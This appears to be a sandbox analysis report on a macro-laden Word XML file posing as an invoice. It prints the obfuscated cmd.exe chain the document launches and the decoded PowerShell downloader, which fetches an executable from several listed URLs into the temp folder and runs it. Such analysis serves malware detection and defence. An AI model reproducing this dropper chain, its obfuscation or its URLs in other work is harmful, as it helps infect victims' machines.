kGhzmwcf5wVT5pEUGYhHs79sls27bTg7u4rOrTU7izfYyYFXSY8ymMzCnD8IKyMGfGE3DXRurdlZ /D8t+MDP66P1FUY32TizjMxIF3bzSSa31uws/rsafHC4m+OMFSpSVDv94W6Xc//N+Ms/ZP7+XznQ u8jhm3U3KM/c8MC1n3wydsWz+28N4jI8FL5+LfsvD6154tqvPH9iRcUjfJFV/ocdvts+Ff2NL7Xk d5888UO60CrHVw5ZC4d/oE4hhjp6NUT1NrzF9Y19LsTYtvt9f3jVhfJsO/qHeOXkITMpCvm3mUlF Gr8N12wN9T75hAsaQxPla1VmSv06pBw2c/uRL1zqQnabsWF1T7cL5Vt3Gr/uQsW23J3LdQ+6UAGQ Nssw6Obm/aGB0dBIpPyn0B4Z28yvvAzpIw5SwdhjWjyKcVkd7D2DKSQ7nWdkjMrc5+xZiMvJLueP CiBpdjGsc5zifAQKTKTkgfj0p4E31NY7kv5+9k5cFXnlhTSwaBYMiLr+1WXZClH8oPz//Fy2YEJW FP62n2QL8LPz3K0/zhaQp+gD/5YtwM+7S9X12YIEfpA+tihbgB9/16ICJrBjKNzxQvYOfhpe0bZk C/Bz8fr/nsVVA33x6w5l74yqHMf5d0MB6oiODoUfpbP3yMPrG76SIxLt/1Z3dbFNVXG8K0O0UgcL BIJRmwYRcIPz/RHSLOtty4hMIMBImCLddidjo+3a4gaIPGgiAz+CiYHogwkiRIJGE0lEE4yMoA8Y E4lMTdCowcCLBhQGCRrPue24/xof2MaDnuw27Tnnnv85/6/zP+f87p3CpHUauNsi2c9f9DO6LKSd fG0JrezK3Djjl1iAO/pgmc+0PkHFRz/Cnkgiql6AXMSUXN3tZ7QJw+fBc4CLjCPxIgFEzKpM/fUq YDzFHEcXAraaO9QQEI1FpuPBoNfj3vxcICMLVCfHvoJclJx31YAOaY1Yutne21jMrNgMyCgq6b3X QGOUSnb4sj/8rBnumR1+BQtGJ9F2v8JmqeX0qP/b4tPX7QNDI5RjUQQtWHx5QwAOQHM18xugQpwQ ueAEYKBEklzo8jMsBF3WTAU6gAkiext8O2nDSIv1lwBZCw2fcwY2KhR7cJff8zaq8ZX1gG1GjPL4 Eb9Cu5D6MWHZuCqdqYcdVorTAQrMRGMpfx0AXMCSqwknPc3OFpYBhloIORv+pEJaDF1qBo2Z1bz6 4RVgUcZuyYocoE855w8vBgomlcb394IamhK26HtLv8ntfwPIx+LLxQNpP8PizMVwGNDHmNDBVuBY TFto7lugQ0wqef1tMFzJKR9eC9oQmuPmdlBDaaWOCkCWailPzQAZxqz5h6eB0VqU+Kp5YJRKCn4N QTlgTd+9x4xyRC04+eU9wFqlOXt6p5Go9S9r9r8GxCAYFUMT/Yxew2O1+z6gYhprHQBKaNHjNKcB GwSh+lPoYLnEogbYeSdDWv8+AIcgMDs/H9gbEfyPDjBoiRi/9nKF+UhyBZhPr8RY1c4GRm2HsgEI v5MbKj9tgRlaoieAEmaEUGLgJHShWunjswB/sNLoeAPwMkIRlXVBDcIYeuY3YKQac/FSAnobo8hn J0N5SMRrtwOZK0TEjkHoKTXDESBCi/+mDauh5SMsazjQLMYFWxoCNThiWi71taKX0TmnQLeMFrFA vGLW4/pLMOtlsZlQ3nkWSFpRLJcc9pvMKzwVqGqfqY/3DEJdoYRiIKRew3HNt/qC32oYfv1OUEEh hfacB6zQWKnJQ4DhWnB6Me37PA++vQVMTWlNsTr4OmA4oVKfAGPPGe8jz4F5po9wTT+XQAEpongm UJ485ZIfOur33AJwBZi7eqjxxROBXTxlZnV0+QvAcUw00mDKNO5BqC3APXQYGaraR6ADxQLffcCn aqHZGHgpD5+9ca9fwQK148Bc27VCYsZ30FuYwIQAlnsYa/F8RWShhXuowuMoncKAOxZ8vW4jlJIJ D+JXgRUQTameBDsqpLqxH7ahJe7OghDDRifTjwCzsKjpqgNQQ5kWN46ZOHJE9GVI87fzoc83Hmzf z0BruVH004AlJuxg+M8FMOzgXGbeB1zGiM4fBnJRishXDlYwUaopNkAtQaJbhip0CYs3gY/vNvME /Xhnhd/BemCwQjMYe24XnA0Zx2vN1HpX9c3N6nlnTZxcLi8fWjo23Kn2trsvfDYlELSLUA/+FbTr 8NAol2uzgvZMYmQ3wKadE+w7zKNBexY4O1jtrYWDgdrAvGAJfWlTvd1RKH+v8d50XeW9Z/r/njrH eX/1GPDPKwOld3zblL0N9C3gxL5S71bpw/9XUVXeB82Vd59Gm2rL468ZBX17upguf5/g7Z6lyju0 7ljoj/r8scVcd1SVvlMEDoeWup1F/wDJRN2gbFU2Bw6XzKIHlK3p6ihuAGWiVLiymM4XV+eWZwtd 3umU12gk8pBjbnHzy/oybt57jGM8j0osScSi21LGGSbiktbHdULVs5STqldJjep1PElZCisL2d0e DYdGluUxb0W+cE4TKqdwqLQwj3lL8nBoebq9O/2kG9vW6OgUSZmmkkrK8klcSvzjJC4ciqcLrtOT LhRinpcyo+p3H01vcimJRU2Ez7khbn/bp2K8vQbzu8ntyTlZw4n+oh0EMlktbr5gGOVkN+XSxa62 Hu9+aqJ7QkwnTQWneXEsmmxMqkScK6y4Ay87wOXxWJTEicaNOM4bsVO6TMliJxYVjkjyRCKZSOFk Etkricd26u2nkecfpgZuXf9bzTWpjDippN9nAR+jStPGoP8dgcCYz9v/LY2W/u1O46FvVCMcam3K FoqRZH/RzXS4+ciSTGf28XDopnng2DaqKEkIhuodawzGDqyFMWrtADkamxU7b9y+qCWeXASNyrS8 JpvvLuTS7a5p0LO6GKqL3PxzwiHP4mKE10Xshakyn0LTukg45NlSZf26CEelywQ35lNi5bUyZt55 fap4CsnrUMX/5fD6MW6kxn8z/Q2bxB6wAAAN8KcAAABEAQAAlwAAAAAAAAAJBAAA/wEBAAAAVgAD AAMA//8AAAAAAAAAAAAAAAAAAAAAEP//BAACAAAAAAAAAAAAAAAAABYAUAByAG8AagBlAGMAdAAu AGEAMwA2ADMAOAAuAGEAdQB0AG8AbwBwAGUAbgABABEBAAMAFgBQAFIATwBKAEUAQwBUAC4AQQAz ADYAMwA4AC4AQQBVAFQATwBPAFAARQBOAAAAQAAAC/AEAAAAEjRWeD==
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleType: paragraph
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentDocumentPropertiesVersion: 16
WordDocumentDocumentPropertiesCharactersWithSpaces: 6
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesCharacters: 6
WordDocumentDocumentPropertiesWords: 1
WordDocumentDocumentPropertiesPages: 2
WordDocumentDocumentPropertiesLastSaved: 2019:01:20 23:14:00Z
WordDocumentDocumentPropertiesCreated: 2019:01:20 23:14:00Z
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesRevision: 1
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent: no
WordDocumentEmbeddedObjPresent: no
WordDocumentMacrosPresent: yes
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
5
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start msoxmled.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3008"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\Invoice-1866321-January.xml"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
XML Editor
Exit code:
0
Version:
14.0.4750.1000
2680"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Invoice-1866321-January.xml"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEMSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1984c:\c4600\w2298\u8250\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set pQ=MeUlY%w1= nBhsT(Xkx5z@2f+PVW~Nv96DIdi3bFQLS8.j/\0'KaC_)ZG}{pmuA$R,7ytc;EO:o4gr-q&&for %H in (59;74;6;5;25;2;11;41;34;52;73;28;19;65;7;5;77;5;42;71;42;42;34;72;29;29;62;0;71;73;28;78;75;65;7;5;12;5;14;71;0;25;73;28;78;37;65;7;5;3;3;9;63;20;43;19;43;32;8;49;6;31;75;48;66;49;70;63;68;31;48;75;19;8;10;1;6;78;74;38;45;1;69;68;9;29;1;68;44;27;1;38;52;3;36;1;10;68;70;63;10;7;31;37;32;8;49;12;68;68;59;73;46;46;38;77;74;13;13;68;51;67;12;67;59;1;44;69;74;44;20;51;46;40;69;36;53;6;32;69;72;77;51;48;51;53;23;21;12;68;68;59;73;46;46;38;74;74;68;51;3;67;44;69;74;60;46;59;45;61;61;59;23;6;46;75;14;25;6;45;38;36;61;53;41;68;76;11;32;38;20;53;64;29;10;71;74;35;13;41;21;12;68;68;59;73;46;46;69;3;61;38;60;1;13;68;77;1;44;69;74;60;46;0;13;66;50;26;16;76;53;60;71;40;32;25;52;72;23;21;12;68;68;59;73;46;46;6;6;6;44;12;45;13;51;10;35;1;77;13;44;10;3;46;62;3;3;59;39;37;61;53;45;67;4;45;31;16;18;21;12;68;68;59;73;46;46;69;74;10;35;74;13;38;67;13;60;35;69;44;59;12;46;55;42;22;43;53;22;37;31;32;45;79;43;49;44;42;59;3;36;68;15;49;21;49;54;70;63;60;43;7;66;75;8;49;12;75;19;48;66;49;70;63;69;22;75;37;75;9;8;9;49;32;75;66;49;70;63;36;31;19;32;48;8;49;36;66;7;37;19;49;70;63;6;66;19;31;22;8;63;1;10;30;73;68;1;60;59;24;49;47;49;24;63;69;22;75;37;75;24;49;44;1;18;1;49;70;23;74;77;1;51;69;12;15;63;17;43;66;32;19;9;36;10;9;63;10;7;31;37;32;54;58;68;77;67;58;63;68;31;48;75;19;44;33;74;6;10;3;74;51;35;39;36;3;1;15;63;17;43;66;32;19;65;9;63;6;66;19;31;22;54;70;63;36;75;31;32;43;8;49;6;19;7;7;37;49;70;34;23;9;15;15;56;1;68;78;34;68;1;60;9;63;6;66;19;31;22;54;44;3;1;10;76;68;12;9;78;76;1;9;75;48;48;48;48;54;9;58;34;10;30;74;17;1;78;34;68;1;60;9;63;6;66;19;31;22;70;63;10;37;37;7;66;8;49;68;75;22;75;48;49;70;38;77;1;51;17;70;57;57;69;51;68;69;12;58;57;57;63;45;22;37;43;75;8;49;23;75;66;49;70;84)do set Pr=!Pr!!pQ:~%H,1!&&if %H geq 84 echo !Pr:~-593!|%CommonProgramFiles(x86):~23,1%%ProgramData:~-5,1%d "c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
255
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2776CmD /V/C"set pQ=MeUlY%w1= nBhsT(Xkx5z@2f+PVW~Nv96DIdi3bFQLS8.j/\0'KaC_)ZG}{pmuA$R,7ytc;EO:o4gr-q&&for %H in (59;74;6;5;25;2;11;41;34;52;73;28;19;65;7;5;77;5;42;71;42;42;34;72;29;29;62;0;71;73;28;78;75;65;7;5;12;5;14;71;0;25;73;28;78;37;65;7;5;3;3;9;63;20;43;19;43;32;8;49;6;31;75;48;66;49;70;63;68;31;48;75;19;8;10;1;6;78;74;38;45;1;69;68;9;29;1;68;44;27;1;38;52;3;36;1;10;68;70;63;10;7;31;37;32;8;49;12;68;68;59;73;46;46;38;77;74;13;13;68;51;67;12;67;59;1;44;69;74;44;20;51;46;40;69;36;53;6;32;69;72;77;51;48;51;53;23;21;12;68;68;59;73;46;46;38;74;74;68;51;3;67;44;69;74;60;46;59;45;61;61;59;23;6;46;75;14;25;6;45;38;36;61;53;41;68;76;11;32;38;20;53;64;29;10;71;74;35;13;41;21;12;68;68;59;73;46;46;69;3;61;38;60;1;13;68;77;1;44;69;74;60;46;0;13;66;50;26;16;76;53;60;71;40;32;25;52;72;23;21;12;68;68;59;73;46;46;6;6;6;44;12;45;13;51;10;35;1;77;13;44;10;3;46;62;3;3;59;39;37;61;53;45;67;4;45;31;16;18;21;12;68;68;59;73;46;46;69;74;10;35;74;13;38;67;13;60;35;69;44;59;12;46;55;42;22;43;53;22;37;31;32;45;79;43;49;44;42;59;3;36;68;15;49;21;49;54;70;63;60;43;7;66;75;8;49;12;75;19;48;66;49;70;63;69;22;75;37;75;9;8;9;49;32;75;66;49;70;63;36;31;19;32;48;8;49;36;66;7;37;19;49;70;63;6;66;19;31;22;8;63;1;10;30;73;68;1;60;59;24;49;47;49;24;63;69;22;75;37;75;24;49;44;1;18;1;49;70;23;74;77;1;51;69;12;15;63;17;43;66;32;19;9;36;10;9;63;10;7;31;37;32;54;58;68;77;67;58;63;68;31;48;75;19;44;33;74;6;10;3;74;51;35;39;36;3;1;15;63;17;43;66;32;19;65;9;63;6;66;19;31;22;54;70;63;36;75;31;32;43;8;49;6;19;7;7;37;49;70;34;23;9;15;15;56;1;68;78;34;68;1;60;9;63;6;66;19;31;22;54;44;3;1;10;76;68;12;9;78;76;1;9;75;48;48;48;48;54;9;58;34;10;30;74;17;1;78;34;68;1;60;9;63;6;66;19;31;22;70;63;10;37;37;7;66;8;49;68;75;22;75;48;49;70;38;77;1;51;17;70;57;57;69;51;68;69;12;58;57;57;63;45;22;37;43;75;8;49;23;75;66;49;70;84)do set Pr=!Pr!!pQ:~%H,1!&&if %H geq 84 echo !Pr:~-593!|%CommonProgramFiles(x86):~23,1%md "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
255
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
932C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $z8586='w9407';$t9045=new-object Net.WebClient;$n1936='http://brosstayhype.co.za/Qci_w6cOra0a_f@http://bootaly.com/pjuupfw/4TPwjbiu_LtgB6bz_RNnEodsL@http://clubmestre.com/Ms7KVXg_mEQ6PCOf@http://www.hjsanders.nl/AllpF3u_jyYj9Xx@http://condosbysmdc.ph/ZS28_2396jq8'.Split('@');$m8174='h4507';$c2434 = '647';$i9560='i7135';$w7592=$env:temp+'\'+$c2434+'.exe';foreach($k8765 in $n1936){try{$t9045.DownloadFile($k8765, $w7592);$i4968='w5113';If ((Get-Item $w7592).length -ge 40000) {Invoke-Item $w7592;$n3317='t4240';break;}}catch{}}$j2384='f47';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 783
Read events
1 330
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
1
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
2680WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVREDA0.tmp.cvr
MD5:
SHA256:
2680WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4E5FDACB.jpg
MD5:
SHA256:
2680WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:633EDCAF70A08EA4C8F9489679EF5BF4
SHA256:446A4274C3E9935A40A0EA6332996E3ABECA0B7D59EB8A541F56397F29158E6E
2680WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.dbbinary
MD5:349F445D49A9D3E4C6BFA8A3654FE84E
SHA256:9CE064EECE5D62E8A09877BC4C7EB609489BA5349675BC12080C1D3A53A78064
2680WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$voice-1866321-January.xmlpgc
MD5:0B89049379BB543843E46C48670235B6
SHA256:8B9AAACEFE285C878D560D21F887E06AEEE85144C764BB5ED66F908A78CA17DE
2680WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:60013EB4BD8CA5B4D1FDA69DE64B05B4
SHA256:B67B37B1A83F5B2CA9DFF5C3ED342BD04EA1DF89954BFD95D49A8F692413692E
2680WINWORD.EXEC:\Users\admin\Pictures\test.jpgimage
MD5:FA1D34A90AD5D2B82437D79F628FEECC
SHA256:0A1380015852F189966E817D7269D56EADB1664FD6E09CCF7E3930F489247BCA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Invoice-1866321-January